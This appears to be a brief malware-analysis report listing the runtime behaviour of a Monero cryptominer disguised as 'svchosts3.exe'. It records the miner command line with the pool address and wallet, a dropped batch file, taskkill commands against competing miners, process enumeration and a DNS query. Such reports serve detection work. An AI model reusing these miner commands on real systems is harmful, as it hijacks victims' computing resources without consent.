Technical Information
- '%TEMP%\RarSFX0\svchosts3.exe' -o xmr.crypto-pool.fr:3333 -u 42gsjPg7BpvSFBjhxGS9NFXy2XPtPU1DpjGankKeRtM9YZ2YmvfF6X4gzWw3SLButodRWeSnnzAexLPiCraMvF6tRFdRXxL -t 8
- '<SYSTEM32>\find.exe' /i "svchosts.exe"
- '<SYSTEM32>\taskkill.exe' /f /t /im minerd.exe
- '<SYSTEM32>\taskkill.exe' /f /t /im svchosts3.exe
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\RarSFX0\s.bat" "
- '<SYSTEM32>\taskkill.exe' /f /t /im svchosts.exe
- '<SYSTEM32>\tasklist.exe' /V /S localhost /U %USERNAME%
- %TEMP%\RarSFX0\s.bat
- %TEMP%\RarSFX0\svchosts3.exe
- 'xm#.##ypto-pool.fr':3333
- DNS ASK xm#.##ypto-pool.fr
- ClassName: '' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''